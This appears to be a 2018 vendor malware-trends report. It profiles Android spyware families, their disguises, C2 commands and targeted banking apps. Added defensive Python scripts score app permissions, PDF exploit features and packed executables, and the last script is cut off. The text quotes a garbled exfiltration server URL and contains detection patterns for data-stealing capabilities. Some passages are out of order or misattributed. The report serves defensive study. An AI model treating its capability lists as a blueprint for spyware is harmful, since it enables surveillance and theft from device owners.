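The timelines in this section are read by eye. As an added example that is not code from the Comodo report, the function below does the same job over a daily per-country detection series, flagging days whose count exceeds a robust rolling baseline by a chosen factor (the "well over ten times the usual" case from the North Korea chart). The series, dates and thresholds are constructed for illustration.

```python
"""Flag spike days in a daily malware-detection series.

Added example, not code from the Comodo report. The series below is
constructed; the only assumption is that telemetry arrives as one
(date, count) pair per day per country, which is what the timelines plot.
"""
from datetime import date, timedelta
from statistics import median
from typing import List, Tuple

Series = List[Tuple[date, int]]


def rolling_median_spikes(series: Series, factor: float = 10.0,
                          window: int = 14, min_history: int = 7
                          ) -> List[Tuple[date, int, float]]:
    """Return (day, count, ratio) for every day whose count is at least
    `factor` times the median of the preceding `window` days.

    A median baseline is used on purpose: a mean would be dragged upward
    by the very spike being measured, and by the elevated day or two that
    usually follows it, which would mask smaller events."""
    ordered = sorted(series)
    spikes = []
    for i, (day, count) in enumerate(ordered):
        history = [c for _, c in ordered[max(0, i - window):i]]
        if len(history) < min_history:
            continue            # not enough quiet days to call a baseline
        base = median(history)
        if base <= 0:
            continue            # no meaningful ratio against a zero baseline
        ratio = count / base
        if ratio >= factor:
            spikes.append((day, count, round(ratio, 1)))
    return spikes


def spike_report(series: Series, factor: float = 10.0) -> List[str]:
    """One line per flagged day, e.g. '2018-05-02 1500 (14.9x)'."""
    return [f"{d.isoformat()} {c} ({r}x)"
            for d, c, r in rolling_median_spikes(series, factor=factor)]


def sample_series() -> Series:
    """Constructed daily counts (not Comodo data) for 30 days from 2018-04-15:
    a noisy baseline near 100, a 3x bump on 2018-04-25, a roughly 15x spike
    on 2018-05-02 and an elevated tail the day after."""
    start = date(2018, 4, 15)
    counts = [98, 104, 110, 95, 101, 99, 107, 93, 102, 100, 310, 98, 104, 96, 101,
              99, 103, 1500, 420, 105, 97, 100, 108, 94, 102, 99, 101, 106, 98, 100]
    return [(start + timedelta(days=i), c) for i, c in enumerate(counts)]


if __name__ == "__main__":
    for line in spike_report(sample_series()):
        print("spike (>=10x baseline):", line)
    for line in spike_report(sample_series(), factor=3.0):
        print("spike (>=3x baseline): ", line)
```

At the report's ten-times threshold only the May 2 day is flagged; lowering the factor to 3 also surfaces the smaller bump and the elevated day after the main spike.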


8 Conclusions

In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details, contacts (id, name, phone numbers) and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server: httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. Also, it extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
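Every spyware family in this section is described by the same set of capabilities (SMS, call logs, contacts, accounts, audio, camera, location, storage). As an added example that is not code from the report, the triage script below maps an app's declared Android permissions to those capabilities and flags an app that claims several of them together with network access. Both manifests are constructed, and the permission-to-capability table and the threshold are this example's assumptions, not Comodo's detection logic.

```python
"""Permission-based triage of an Android app against the spyware capability
set described in this section. Added example, not the report's own tooling;
the capability table and the review threshold are assumptions."""
import xml.etree.ElementTree as ET
from typing import Dict, Set, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"   # ElementTree spelling of android:name

# Declared permission -> the collection capability it enables. The permission
# names are real; tying them to this section's behaviours is the assumption.
CAPABILITIES: Dict[str, str] = {
    "android.permission.READ_SMS": "read SMS",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.SEND_SMS": "send SMS",
    "android.permission.READ_CALL_LOG": "read call log",
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.GET_ACCOUNTS": "enumerate accounts",
    "android.permission.RECORD_AUDIO": "record audio or calls",
    "android.permission.CAMERA": "capture photos or video",
    "android.permission.ACCESS_FINE_LOCATION": "track location",
    "android.permission.READ_EXTERNAL_STORAGE": "read external storage",
}
NETWORK = "android.permission.INTERNET"   # needed to upload what was collected


def declared_permissions(manifest_xml: str) -> Tuple[str, Set[str]]:
    """Parse AndroidManifest.xml text and return (package, permission names)."""
    root = ET.fromstring(manifest_xml)
    perms = {el.get(NAME_ATTR) for el in root.iter("uses-permission")}
    return root.get("package", ""), {p for p in perms if p}


def assess(manifest_xml: str, threshold: int = 3) -> Dict[str, object]:
    """Flag an app for review when it declares at least `threshold` collection
    capabilities together with network access. Launcher-icon hiding of the
    kind KevDroid performs happens at runtime and is not visible here."""
    try:
        package, perms = declared_permissions(manifest_xml)
    except ET.ParseError as exc:
        return {"package": "", "capabilities": [], "network": False,
                "verdict": "unparseable", "error": str(exc)}
    caps = sorted(CAPABILITIES[p] for p in perms if p in CAPABILITIES)
    network = NETWORK in perms
    verdict = "review" if network and len(caps) >= threshold else "ok"
    return {"package": package, "capabilities": caps,
            "network": network, "verdict": verdict}


def manifest(package: str, *perms: str) -> str:
    """Build a minimal constructed manifest for the demo."""
    body = "".join(f'<uses-permission android:name="{p}"/>' for p in perms)
    return (f'<manifest xmlns:android="{ANDROID_NS}" package="{package}">'
            f'{body}<application/></manifest>')


# Constructed inputs (package names are made up): a plausible utility app and
# a "Defender"-style decoy declaring the collection set described for KevDroid.
BENIGN_MANIFEST = manifest("com.example.flashlight",
                           NETWORK, "android.permission.VIBRATE")
SPYWARE_MANIFEST = manifest("com.example.fakedefender", NETWORK,
                            "android.permission.READ_SMS",
                            "android.permission.READ_CALL_LOG",
                            "android.permission.READ_CONTACTS",
                            "android.permission.GET_ACCOUNTS",
                            "android.permission.RECORD_AUDIO",
                            "android.permission.CAMERA")

if __name__ == "__main__":
    for m in (BENIGN_MANIFEST, SPYWARE_MANIFEST):
        print(assess(m))
```

The score is a triage hint, not a verdict: a legitimate messaging or backup app legitimately declares several of these permissions, so the output is meant to prioritise which uploads a reviewer looks at first.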


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser's data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and videos
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control over the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

• Extract the device information
• Delete SMS
• Set ringer mode
• Monitor incoming SMS messages
• Clear memory
• Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
• Extract contacts details
• Set Wi-Fi always turned on

Version 2 can execute additional commands:

• Send SMS and read outgoing SMS
• Enable and disable a Wi-Fi connection
• Access a location specified by attackers
• Make recordings
• Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:


• Send_SMS: extract SMS content and send it to the C&C server
• Send_USSD: send the USSD to the C&C server
• Gethistory: monitor browser history
• Start_AllApp: gather info about installed applications
• Send_call: set the Intent action to call
• Forward_call: forward incoming calls
• ResForward_call: reset call forwarding
• Go_Smsmnd: delete SMS content
• Go_GetAlls: get SMS history
• Dell_sms: delete SMS content in a conversation
• Send_spam: send spam SMS
• Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. Also, it checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

• contacts: get contact details and email id
• Mute: set action to mute
• Mms: get MMS content
• info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

• de.postbank.finanzassistent
• pl.mbank
• aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks and messengers for spreading.

Version 1: CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره Proxy دوست یاب Telegram Ton شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages, records audio, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May


4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial-of-service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


52 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
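As an added example (not code from the Comodo report), the following static triage script shows what a defender can check in the PDF files that carried most of the quarter's exploits: it looks for the document features exploit PDFs depend on, decodes the "#xx" name escapes used to hide them, and flags streams with stacked filters. The two PDFs, the name weights and the verdict threshold are constructed assumptions.

```python
"""Static triage of PDF files for the features exploit documents rely on.

Added example, not code from the Comodo report. It scans a PDF's raw bytes
for names such as /JavaScript, /OpenAction and /Launch, decodes the #xx hex
escapes that malicious documents use to hide those names (e.g. /J#61vaScript),
and counts streams that stack several filters. The sample PDFs are
constructed inline for illustration; the weights are assumptions.
"""
import re
from collections import Counter

# Names that are legal PDF but appear far more often in exploit documents
# than in ordinary office output, with an assumed weight for each.
RISKY_NAMES = {
    "/JavaScript": 4, "/JS": 4, "/OpenAction": 3, "/AA": 3,
    "/Launch": 5, "/EmbeddedFile": 2, "/RichMedia": 3, "/XFA": 2,
}
NAME_RE = re.compile(rb"/[A-Za-z0-9#]+")            # a PDF name token
FILTER_RE = re.compile(rb"/Filter\s*\[([^\]]*)\]")   # array-valued /Filter
SUSPICIOUS_AT = 6                                    # assumed verdict threshold


def unescape_name(name: bytes) -> bytes:
    """Decode PDF name hex escapes: b'/J#61vaScript' -> b'/JavaScript'."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), name)


def scan_pdf(data: bytes) -> dict:
    """Return risky-name counts, obfuscation hits, stacked filters and a score."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF header")
    counts = Counter()
    obfuscated = 0
    for m in NAME_RE.finditer(data):
        raw = m.group(0)
        name = unescape_name(raw).decode("latin-1")
        if name in RISKY_NAMES:
            counts[name] += 1
            if raw != name.encode("latin-1"):
                obfuscated += 1        # the risky name was hidden by #xx escapes
    multi_filter = sum(
        1 for m in FILTER_RE.finditer(data)
        if len(NAME_RE.findall(m.group(1))) > 1)
    score = sum(RISKY_NAMES[n] * c for n, c in counts.items())
    score += 3 * obfuscated + 2 * multi_filter
    return {
        "names": dict(counts),
        "obfuscated_names": obfuscated,
        "multi_filter_streams": multi_filter,
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_AT else "likely benign",
    }


# Constructed samples: an ordinary one-page document, and a document whose
# catalog runs a hidden JavaScript action on open through a stacked filter.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
    b"4 0 obj << /Length 5 /Filter /FlateDecode >> stream\nxxxxx\nendstream endobj\n"
    b"%%EOF\n")
SUSPICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"5 0 obj << /S /J#61vaScript /JS 6 0 R >> endobj\n"
    b"6 0 obj << /Length 3 /Filter [/ASCIIHexDecode /FlateDecode] >> stream\n"
    b"...\nendstream endobj\n"
    b"%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, scan_pdf(doc))
```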


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
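As an added example (not code from the Comodo report or the UPX project), here is the kind of packer triage a defender runs over a Windows executable: it parses the PE section table with the standard library only, measures each section's Shannon entropy, and reports the traces that a UPX-style packer leaves behind. The two PE images are constructed inline with a tiny builder, so they are not real binaries; the 7.0 entropy limit and the section-size heuristics are assumptions.

```python
"""Packer triage for Windows PE files: section names and Shannon entropy.

Added example, not code from the Comodo report. It walks the PE section
table with the standard library only, computes each section's entropy and
reports the traces a UPX-style packer leaves: sections named UPX0/UPX1, an
empty section with a large virtual size (the unpack destination) and a
high-entropy section holding the compressed image. The PE images below
are constructed inline with a tiny builder; they are not real binaries.
"""
import math
import random
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Yield (name, virtual_size, raw_size, raw_bytes) for each section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                          # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                 # section table follows the optional header
    for i in range(num_sections):
        name, vsize, _va, rsize, rptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        yield (name.rstrip(b"\0").decode("ascii", "replace"),
               vsize, rsize, pe[rptr:rptr + rsize])


def packer_indicators(pe: bytes, entropy_limit: float = 7.0) -> dict:
    """Combine name and entropy heuristics into a packed/not-packed verdict."""
    names, empty_large, high_entropy = [], [], []
    for name, vsize, rsize, data in parse_sections(pe):
        names.append(name)
        if rsize == 0 and vsize >= 0x1000:
            empty_large.append(name)      # nothing on disk, lots in memory
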